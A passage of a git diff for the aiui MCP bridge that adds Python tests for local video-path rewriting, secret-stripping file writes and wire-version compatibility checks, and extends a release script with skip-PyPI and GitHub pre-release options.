+    _collect_local_videos(spec, found)
+    # De-duplicated: the same path in two slots appears once.
+    assert found == ["/Users/me/one.mp4"]
+
+    mapping = {"/Users/me/one.mp4": "http://127.0.0.1:7777/media/blob/x.mp4"}
+    _replace_srcs(spec, mapping)
+    assert spec["items"][0]["src"] == "http://127.0.0.1:7777/media/blob/x.mp4"
+    assert spec["items"][3]["thumbnail"] == "http://127.0.0.1:7777/media/blob/x.mp4"
+    # Untouched: https video and the image.
+    assert spec["items"][1]["src"] == "https://x.test/two.mp4"
+    assert spec["items"][2]["src"] == "/Users/me/pic.png"
diff --git a/python/tests/test_target_write.py b/python/tests/test_target_write.py
new file mode 100644
index 0000000..b9f2f27
--- /dev/null
+++ b/python/tests/test_target_write.py
@@ -0,0 +1,98 @@
+"""Bridge-side file-write tests (#135).
+
+Mirror of the Rust `filewrite` tests. The bridge runs ON the agent's host, so
+`target` writes are local file operations here too; secret values are written
+and stripped before the result reaches the agent.
+"""
+from __future__ import annotations
+
+import os
+from pathlib import Path
+
+from aiui_mcp.server import (
+    _apply_target_writes,
+    _collect_target_fields,
+    _write_local_target,
+)
+
+
+def test_collect_target_fields_flat_and_tabs() -> None:
+    spec = {
+        "kind": "form",
+        "fields": [{"kind": "secret", "name": "a", "target": {"mode": "create", "path": "/x"}},
+                   {"kind": "text", "name": "b"}],
+        "tabs": [{"label": "T", "fields": [{"kind": "text", "name": "c", "target": {"mode": "create", "path": "/y"}}]}],
+    }
+    names = sorted(f["name"] for f in _collect_target_fields(spec))
+    assert names == ["a", "c"]
+
+
+def test_create_writes_and_refuses_clobber(tmp_path: Path) -> None:
+    path = tmp_path / "sub" / "key"
+    target = {"mode": "create", "path": str(path), "perm": "0600"}
+    out = _write_local_target("s3cr3t", target)
+    assert out["written"], out
+    assert path.read_text() == "s3cr3t"
+    assert (path.stat().st_mode & 0o777) == 0o600
+    # Refuse clobber without overwrite.
+    out2 = _write_local_target("other", target)
+    assert not out2["written"] and out2.get("error")
+    assert path.read_text() == "s3cr3t"
+    # ...unless overwrite.
+    out3 = _write_local_target("new", {**target, "overwrite": True})
+    assert out3["written"]
+    assert path.read_text() == "new"
+
+
+def test_substitute_replaces_exactly_once(tmp_path: Path) -> None:
+    path = tmp_path / "config.yaml"
+    path.write_text("token: __PAT__\nother: 1\n")
+    out = _write_local_target("ghp_x", {"mode": "substitute", "path": str(path), "placeholder": "__PAT__"})
+    assert out["written"], out
+    assert path.read_text() == "token: ghp_x\nother: 1\n"
+
+
+def test_substitute_errors_on_zero_or_many(tmp_path: Path) -> None:
+    path = tmp_path / "c.txt"
+    path.write_text("none here")
+    assert not _write_local_target("v", {"mode": "substitute", "path": str(path), "placeholder": "X"})["written"]
+    path.write_text("X and X")
+    assert not _write_local_target("v", {"mode": "substitute", "path": str(path), "placeholder": "X"})["written"]
+
+
+def test_apply_target_writes_strips_secret(tmp_path: Path) -> None:
+    secret_path = tmp_path / "tok"
+    note_path = tmp_path / "note"
+    spec = {
+        "kind": "form",
+        "fields": [
+            {"kind": "secret", "name": "pat", "target": {"mode": "create", "path": str(secret_path)}},
+            {"kind": "text", "name": "label", "target": {"mode": "create", "path": str(note_path)}},
+            {"kind": "text", "name": "plain"},
+        ],
+    }
+    data = {
+        "cancelled": False,
+        "result": {"action": None, "values": {"pat": "ghp_secret", "label": "hello", "plain": "kept"}},
+    }
+    _apply_target_writes(spec, data)
+    values = data["result"]["values"]
+    # Secret: value gone, only the write outcome remains; file has the secret.
+    assert "ghp_secret" not in str(values["pat"])
+    assert values["pat"]["written"] is True
+    assert secret_path.read_text() == "ghp_secret"
+    # Non-secret target: value retained alongside the outcome; file written.
+    assert values["label"]["value"] == "hello"
+    assert values["label"]["written"] is True
+    assert note_path.read_text() == "hello"
+    # Untargeted field untouched.
+    assert values["plain"] == "kept"
+
+
+def test_apply_target_writes_noop_on_cancel(tmp_path: Path) -> None:
+    secret_path = tmp_path / "tok"
+    spec = {"kind": "form", "fields": [{"kind": "secret", "name": "pat",
+            "target": {"mode": "create", "path": str(secret_path)}}]}
+    data = {"cancelled": True, "result": {}}
+    _apply_target_writes(spec, data)
+    assert not secret_path.exists(), "no write on cancel"
diff --git a/python/tests/test_wire_compat.py b/python/tests/test_wire_compat.py
new file mode 100644
index 0000000..68af19f
--- /dev/null
+++ b/python/tests/test_wire_compat.py
@@ -0,0 +1,104 @@
+"""Tests for the cooperative version floor (Step 2).
+
+The Mac companion no longer kills this bridge to force a version. Instead both
+sides carry a `wire_version`; on a hard mismatch the bridge surfaces a
+structured "restart this session" tool error and otherwise tolerates ordinary
+app-version skew. These cover `_check_wire_compat`.
+"""
+from __future__ import annotations
+
+import asyncio
+from typing import Any
+
+import httpx
+import pytest
+
+import aiui_mcp.server as server
+from aiui_mcp.server import EXPECTED_WIRE_VERSION, _check_wire_compat
+
+
+class _FakeResp:
+    def __init__(self, payload: dict[str, Any]) -> None:
+        self._payload = payload
+
+    def raise_for_status(self) -> None:  # all fakes are 200
+        return None
+
+    def json(self) -> dict[str, Any]:
+        return self._payload
+
+
+def _setup_token(monkeypatch: pytest.MonkeyPatch, tmp_path: Any) -> None:
+    token_file = tmp_path / "token"
+    token_file.write_text("dummy-token-for-tests")
+    monkeypatch.setattr(server, "TOKEN_PATH", token_file)
+
+
+def _run_check() -> None:
+    async def run() -> None:
+        async with httpx.AsyncClient() as client:
+            await _check_wire_compat(client)
+
+    asyncio.run(run())
+
+
+def test_matching_wire_version_passes_and_memoises(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "_wire_checked", False)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({"wire_version": EXPECTED_WIRE_VERSION})
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    _run_check()  # must not raise
+    assert server._wire_checked is True
+
+
+def test_mismatched_wire_version_raises_structured_error_and_does_not_memoise(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    """A differing `wire_version` raises and leaves `_wire_checked` False."""
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "_wire_checked", False)
+
+    async def skewed_version(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({"wire_version": EXPECTED_WIRE_VERSION + 998})
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", skewed_version)
+    with pytest.raises(RuntimeError, match="incompatible aiui versions"):
+        _run_check()
+    # The failure must not be cached: once the companion is restarted, the
+    # same bridge process has to be able to pass the check again.
+    assert server._wire_checked is False
+
+
+def test_missing_wire_version_field_is_tolerated(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    """An older companion without the field is treated as wire v1 → compatible."""
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "_wire_checked", False)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        return _FakeResp({"version": "0.4.46"})  # no wire_version
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    _run_check()  # must not raise
+    assert server._wire_checked is True
+
+
+def test_read_error_is_tolerated_not_fatal(
+    monkeypatch: pytest.MonkeyPatch, tmp_path: Any
+) -> None:
+    """A transient /version read failure must not block rendering."""
+    _setup_token(monkeypatch, tmp_path)
+    monkeypatch.setattr(server, "_wire_checked", False)
+
+    async def fake_get(self: Any, url: str, **kwargs: Any) -> Any:
+        raise httpx.ConnectError("companion down")
+
+    monkeypatch.setattr(httpx.AsyncClient, "get", fake_get)
+    _run_check()  # must not raise — tolerate skew/transient
+    assert server._wire_checked is True
diff --git a/scripts/release.sh b/scripts/release.sh
index 78c2f1d..a10f624 100755
--- a/scripts/release.sh
+++ b/scripts/release.sh
@@ -50,8 +50,13 @@ fi
 : "${BUILD_KEYCHAIN:?not set}"
 : "${BUILD_KEYCHAIN_PASS_FILE:?not set}"
 : "${TAURI_SIGNING_PRIVATE_KEY_PATH:?not set}"
-: "${UV_PUBLISH_TOKEN:?not set — needed for publishing aiui-mcp to PyPI. Put it in .env.release or export before running. See script header for details.}"
-export UV_PUBLISH_TOKEN
+# AIUI_SKIP_PYPI=1 → validate-first / pre-release flow: build + sign + notarize
+# + GitHub release WITHOUT publishing aiui-mcp to PyPI (PyPI versions are
+# permanent; defer until the build is validated). The token is then not needed.
+if [[ "${AIUI_SKIP_PYPI:-}" != "1" ]]; then
+  : "${UV_PUBLISH_TOKEN:?not set — needed for publishing aiui-mcp to PyPI. Put it in .env.release or export before running. See script header for details. (Or set AIUI_SKIP_PYPI=1 to skip PyPI for a pre-release.)}"
+  export UV_PUBLISH_TOKEN
+fi
 # Tauri bundler reads TAURI_SIGNING_PRIVATE_KEY (literal key content) during
 # `tauri build`, not the _PATH variant. Load the file content here.
 export TAURI_SIGNING_PRIVATE_KEY="$(cat "${TAURI_SIGNING_PRIVATE_KEY_PATH}")"
@@ -230,6 +235,12 @@ update themselves in place via the in-app updater.
 See the [full diff](https://github.com/byte5ai/aiui/commits/${TAG}).
 NOTES_EOF
 
+# AIUI_RELEASE_PRERELEASE=1 → mark as a GitHub pre-release. GitHub's
+# `/releases/latest/` (what the in-app updater reads) skips pre-releases, so
+# this does NOT auto-update any client — for validate-first delivery. Promote
+# later with `gh release edit ${TAG} --prerelease=false` (then PyPI-publish).
+GH_PRERELEASE_FLAG=""
+[[ "${AIUI_RELEASE_PRERELEASE:-}" == "1" ]] && GH_PRERELEASE_FLAG="--prerelease"
 gh release create "${TAG}" \
   "${DIRECT_DMG}" \
   "${DIRECT_ZIP}" \
@@ -237,15 +248,20 @@ gh release create "${TAG}" \
   "${LATEST_JSON}" \
   --repo byte5ai/aiui \
   --title "aiui ${TAG}" \
-  --notes-file "${NOTES_FILE}"
+  --notes-file "${NOTES_FILE}" \
+  ${GH_PRERELEASE_FLAG:+"${GH_PRERELEASE_FLAG}"}
 
-echo "✓ Released ${TAG} on GitHub"
+echo "✓ Released ${TAG} on GitHub${GH_PRERELEASE_FLAG:+ (pre-release)}"
 
 # PyPI publish AFTER the GitHub release succeeds. If this step fails the
 # Tauri side is already shipped and the manual recovery is `cd python &&
 # uv publish dist/*` once the credential issue is fixed. The pre-flight
 # token check at the top of this script is what stops us from getting
 # here without a token.
-echo "→ Publishing aiui-mcp ${VERSION} to PyPI"
-(cd python && uv publish)
-echo "✓ Published aiui-mcp ${VERSION} to PyPI"
+if [[ "${AIUI_SKIP_PYPI:-}" == "1" ]]; then
+  echo "→ Skipping PyPI publish (AIUI_SKIP_PYPI=1) — run \`cd python && uv publish\` (or promote) when validated"
+else
+  echo "→ Publishing aiui-mcp ${VERSION} to PyPI"
+  (cd python && uv publish)
+  echo "✓ Published aiui-mcp ${VERSION} to PyPI"
+fi